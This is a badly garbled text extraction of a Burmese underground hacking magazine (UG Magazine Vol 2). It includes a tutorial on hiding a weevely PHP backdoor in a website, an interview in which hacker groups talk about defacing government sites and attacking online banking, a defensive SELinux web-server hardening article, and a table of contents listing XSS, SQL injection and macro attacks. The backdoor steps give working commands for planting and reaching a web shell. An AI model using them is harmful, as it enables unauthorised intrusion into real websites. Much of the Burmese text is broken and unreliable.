page link ) ။ Incoming link (
rank ) ။ Ranking
။ rank ။
။ Java Oracle Oracle
rank ။ AI, Machine learning
Google ။ Ranking ႔ S t
relevant ႔ ။ user
rank ။Larry page ႔ paper
ၐ paper title ႔ google ။
Ko Thet Khine

How to Hide Backdoor In Website
႔ W t Hacking Shell ။ Admin S

။ Website Backdoor ။ shell
႔ Backdoor ။
tuto weevely ။ weevely kali linux preinstall

။ ႔ t ။ Command
weevely generate password /root/Desktop/backdoor.php
႔P ႔ ။
password attacker name ။ t

။ ႔ Desktop backdoor.php ႔ ။
႔F copy ။
File texteditor ။

C copy ။ ႔shell Site ။ php file edit

paste ။ main.php backdoor ။

C file Save ။ ႔ Termianl ။

။T ။
weevely http://www.site.com/main.php password
tt :// t / ႔ backdoor . file path ။

backdoor Password ။
႔ t ။
Backdoor ႔ ။
႔ ။
Greetz : All Myanmar Black Hats
Fr33d0m N00b

Interview with UGMH
MBH ။ ။
UGMH ။ ။
MBH ။ ။ ႔ UGMH ႔ cyber war ။
။
UGMH ။ ။ ႔ UGMH
။ ႔ ႔ ။
MBH ။ ။UGMH T
။ ႔ ။
။
UGMH ။ ။ ႔ Team
႔ ႔ UGMH
။H T ႔ ႔ ။
႔ ႔
Hacker freedom ႔ Team ႔ ႔
။ UGMH
႔
။ T
႔ ။
MBH ။ ။ ၐ ။
႔ UGMH ႔
႔ ႔ ။
UGMH ။ ။ ။ ႔ ႔ cyber space

႔ ။ ။ ႔
႔ ။
hacking
႔ ။
deface ။
cyber space ။
။
႔ ႔ ။ website D
security ႔ ႔
။
။

Win ႔ Zaw
Operation ႔ ။
MBH ။ ။ UGMH
ၐ ။ R
။
UGMH ။ ။ UGMH Hacking T Team
။ ။
႔ Team ႔ ႔ ႔ ႔ UGMH
။UGMH
cyber space ႔ ။
MBH ။ ။ T ႔ ။
UGMH ။
UGMH ။ ။ Team Lead ႔
။ ႔
။ ႔
။ UGMH group ။
ၑ ၑ ႔
Protocol ။ ၑ ။ ႔
။ Team ။
။
MBH ။ ။ M4L UGMH
။ ။
။
UGMH ။ ။ ။ ႔ ။
႔ UGMH ႔ ။
႔ ။ ႔
။
MBH ။ ။ ႔ ။ ။
။
UGMH ။ ။ ၒ ။ ႔ page message ႔
။
။
။ ႔ ႔
။ ႔
႔ ။ gov.mm

႔ Recovery
။
႔ ႔ Message
႔
။
႔ ႔ ။
MBH ။ ။ cyber war post ႔ ။
႔
႔ ။
UGMH ။ ။ ။ ။ online banking
၉ 48 shutdown
။ ။
႔ bank online bank
။ ႔
။ ဏ
UGMH Member ။
႔ ။ ႔ ၊
။
MBH ။ ။ ။ ဏ ႔ ။။
UGMH ။ ။ ႔ ႔ ။
ဏ ဏ
။
႔
႔ ။
MBH ။ ။ ။
။
UGMH ။ ။ UGMH ။ ႔M ။
( ။ )

Web Server Hacking

Yan Naing Myint (Cyber Wings)
။ ။ ။ No lock is safe ။
Deface
Attacking Method Tools ႔ Version
႔ ။
C S t Red Team (Attack) ႔ Blue Team (Defense) ႔

Blue Team Defense
။ Web Server Rooting
Operating System, Web Server (Apache), PHP ႔
SEL ။ SEL ။
S R t ၄
[x] SELinux ၏
[x] Web Application File/Folder
[x] User SEL
S R t ၄
Power ။ Power
႔ ။
1. Power On Self Test
2. MBR/Boot Loader Check
3. Loading Kernel

4. Loading OS
5. Loading Services & Applications
၅ ႔ ။
R t E t K V ၐ
။ R t E t
Kernel ႔ ။
ၐ ၅ ။ Web Server
Web Site Hacking Shell E t Upload Execute
Server R t Rooting Exploit ၅ ၃
႔ ။ ၍ Service/Application Level Kernel
Rooting ။ Rooting
Kernel ႔ ။
Read/Write/Execute ႔U /G
Discretionary Access Control ႔ ၐ DAC P ႔ ။ Kernel
R t ႔ ႔ ။
Kernel Kernel System

Permission Mandatory Access Control ႔ ၐ MAC
P ။ MAC Permission SELinux ။ DAC
R /W t /E t U /G L ႔ U G
P F F ႔N t I t N t P t
R T MAC Permission S A
ၒ ။ SELinux Enforcing ႔ P
L C Exploit Source
Code Upload ႔ Compile ႔ ။ Compile ႔
Execute ႔ Rooting ၉၈
။
႔ MAC Permiss DAC P ႔ System

ၐ Permission ။
DAC MAC ။ ႔ MAC DAC ။ DAC ႔ MAC
Configure ။

Photo Credit: Slide of Daniel J Walsh (Red Hat Security Team)
SELinux ၏
SELinux ႔ Label Engine ။ Label

U G P F F
႔ N t I t N t P t Label ႔ Label
။ Firewall Rules Label ။ SELinux Label
SELinux Security Context ႔ ၐ ။ ၄ SELinux Security Context
SELinux User, SELinux Role, SELinux Type ႔ SELinux Levels ၄ ။
Label Apache File R
Apache (httpd) Process Label Read File Label
Policy ။ (Label
"Web Application File/Folder "
)

P User File/Folder Read/Write/Execute

႔ Request Action ႔၄ Thread Kernel
။ SELinux P ႔ ။
႔ DAC Permission ။ DAC Permission
MAC Permission Reject ။
႔ DAC P MAC P
။ MAC Permission
Permission ႔ R t ။ DAC MAC
Permission Process ။
႔ Allow Reject
Access Vector Cache ႔ ၐ Log ။ ၍
SELinux ႔ Security Policy ႔
A t -R t D tR t ။
Web Application File/Folder
W t Web Applicat F St t
႔ ။ Path W t
Path Write Access ။ ႔
Developer Website/WebApp
။ Wordpress F
St t ၐ SEL file path ။

Wordpress File Structure ။ "wp- t t‖ Folder

t ႔ website P T
။ Website wp-content Apache Write
Access ႔ ႔ SELinux Type Label ႔ ― tt t t t‖ ။
T Configure P
Wordpress Website H P T
Fi St t ၍ 404.php ႔ function.php
႔ Shell ။ ႔ wordpress file edit
- t t themes ႔ plugin folder ႔ ၄ ႔
file Apache Read Access Write Access ။ ႔
SELinux Type Label " tt t t t‖ ။
- t t uploads folder ။W U
P t
။ ၄ F Apache Write Access ( SELinux Type Label: httpd_sys
_rw_content_t ) ။ ႔ ၄ Shell ။
႔ W -S ClamAV ႔ Anti-
Virus ႔ S ။
Wordpress Folder Apache R O A

SEL T L : tt t t t uploads F
R /W t A SEL T L : tt t t t
႔ ClamAV ႔ ႔H W
U C t Shell ႔ Shell ႔ D
႔ ႔ ။
File ၏ SELinux Label chcon ႔ ၐ command ၄ ႔

- ။
႔ ―B / ?‖
SELinux N t P t Label ။ Apache Process SEL

L httpd_t Network Port 80/443 ႔ tt t tL
။ Network Port
Port ။

User SEL
DAC Permission ႔ SELinux

။ DAC Permission
U F F ႔ P
။ ၄ Permission ၍
System ။ ႔ Hacker
Access ။ Hacker
႔ CP C L
႔ ။ ႔ U Login ၍ U
T ၄ ႔ System File Path ဏ
။
Linux User ၃ ႔။ user1 Senior System Administrator, user2

J S t A t t user3 User ႔။ SELinux user1
sysadm_u user2 staff_u user3 user_u ။
user1 SELinux System Administrator Level ႔ Service
St t/St /R t t Log File user data System
t/ t System Administration
။J S t A t t user2 L ႔ F
Junior System Administrator ႔ ။
user_u user3 Home Directory user_home_t

Label F /F Access C L ႔
႔ ။ ႔ System Administration
Network Port ။ SELinux
user_u User t ။
user_u user t ႔ root password
root user ။

" ‖ command ၄ ႔ policycoreutils-python

Package ။
SELinux ႔"
"―
"― ႔ SELinux ။ " ႔ SELinux
။ MAC P
႔ ။
SELinux ။ SELinux Firewall

Antivirus ။ ႔ All-in-One Security Solution ။
SELinux "S t E L ‖ ႔
( DAC S t P Kernel
Tool ။
SELinux ႔ SELinux
၊ Defensive
Security SELinux ၊ Defensive Security
႔ SELinux ႔
။
Yan Naing Myint
CEO, Head of Server Administration Department
Cyber Wings Co., Ltd.

႔ print magazine ႔ ။ PDF UGMH

႔ ။ ။ ႔
။ Page ႔
႔ ။ ႔ ႔ ႔
။ ႔ ။ ႔
။ ။
။ ႔
႔ ။ ႔
။
။
။ Magazine
UGMH ႔ MBH ။ ႔
႔ ။
Red Bee Company LTD. ။ ႔

႔ ႔ ႔ ။ ၂
။ ႔
။ ။
႔ ။ ႔
႔ ။
။
။
Facebook page ႔ ။ ။
႔ ႔ ။
( )
၊ ႔
႔ ။
႔ ႔ ၊
။

႔ MBH UGMH
။
Preview Hacking Team MHU BHA BMH MNH ႔ GHT ႔

။ BHG H T
။
Cover photo design ႔ D ႔

။
႔
။
UG Magazine Team


UG@Magazin

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

UG@Magazin

Uploaded by

Copyright:

Available Formats

1|Page UG MAGAZINE VOL 2 Produced By MBH

Power By Union Of Underground Myanmar Hackers

Power By Union Of Underground Myanmar Hackers

Power By Union Of Underground Myanmar Hackers

Find the Egg with enumeration 8

Google Hacking Data Base 17

Installation Wordpress In Kali Linux 20

DNS (Domain name System) 24

Hijack Cookies with XSS 32

Attacking With Macro 46

REVERSE FROM THE SERVER 50

COOKIE BASED INJECTION 56

Fire sale Cyber attack 89

BITCOIN ( BTC ) 110

DOCKER (၁) 111

Power By Union Of Underground Myanmar Hackers

Developer vs Pentester In Myanmar 115

Cyber Warfare 119

facebook account 124

Sqli Injection [ routed query] 130

CSRF(cross site request forgery) 138

How to deface with JS or XSS defacement 143

How I hacked Android App 149

Cryptography&Encryption For Beginner 157

Attacking Web Service 168

Facebook Security 174

How Search Engine works 181

How to Hide Backdoor In Website 184

Interview with UGMH 187

Web Server Hacking 190

Power By Union Of Underground Myanmar Hackers

Power By Union Of Underground Myanmar Hackers

social website Facebook ။

Min Thu (UG Magazine Editor)

Myanmar Black Hacking

Power By Union Of Underground Myanmar Hackers

Find the Egg with enumeration

Power By Union Of Underground Myanmar Hackers

1. IP and DNS enumeration

Kali linux default ။Domain Information

Whois record domain name Owner IP Address, Contact address, Domain

Power By Union Of Underground Myanmar Hackers

Dnsenum dns information ။

Target DNS ႔ DNSSpy ႔ ။ DNSSpy target

Power By Union Of Underground Myanmar Hackers

DNS reverse tool viewdns website ။ DNS ႔ IP

Power By Union Of Underground Myanmar Hackers

Target websit ႔ Target system ႔

Power By Union Of Underground Myanmar Hackers

Power By Union Of Underground Myanmar Hackers

Command line tool ႔ whatweb target t

Power By Union Of Underground Myanmar Hackers

4. Finding hidden resources

crawling ၐ hidden file

Target basic information ႔

Power By Union Of Underground Myanmar Hackers

Target system https ssl ႔ ။ ssllabs GUI

7. Github Repositories Github ။ public

8. Mapping Data t ႔ system

Thanks for reading...

Google Hacking Data Base

Zen Zue 127.0.0.1

- inurl:index.php?id= inurl url ။index.php

။S zip bak ။ Intext